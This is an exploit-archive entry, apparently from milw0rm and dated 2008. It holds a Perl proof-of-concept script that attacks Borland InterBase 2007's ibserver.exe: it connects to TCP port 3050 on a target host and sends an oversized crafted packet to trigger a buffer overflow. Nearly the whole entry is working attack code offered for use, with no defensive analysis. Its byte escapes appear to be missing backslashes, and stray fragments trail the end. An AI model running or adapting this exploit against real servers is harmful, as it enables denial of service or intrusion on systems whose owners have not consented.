Borland InterBase 2007 ibserver.exe Buffer Overflow PoC :

Date : 2008-04-11 Author : Liu Zhen Hua
###############################################################################################################
#                                 POC.pl                                                                   #
###############################################################################################################
#!/usr/bin/perl -w
#Author:  Liu Zhen Hua <alau [at] 163.com>

use IO::Socket;
use strict;
my $host=$ARGV[0];
sub usage {
print "usage: perl poc.pl serverip
";
}
if ($#ARGV < 0) {
usage();
exit();
}
my $victim = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$host,
                                PeerPort=>3050);
my $pad0 = "x41"x1000;       #"x00x00x03xE8"
my $pad5 = "x43"x16;
my $exploit = "x00x00x00x52xFFxFFxFFxFFx00x00x03xE8".$pad0."x00x00x00x10".$pad5;
print $victim $exploit ;
print " + Malicious  request sent ...
";
sleep(1);
print "Done.
";
close($victim);
exit;

# milw0rm.com [2008-04-11]

C1

 

C2

 

C3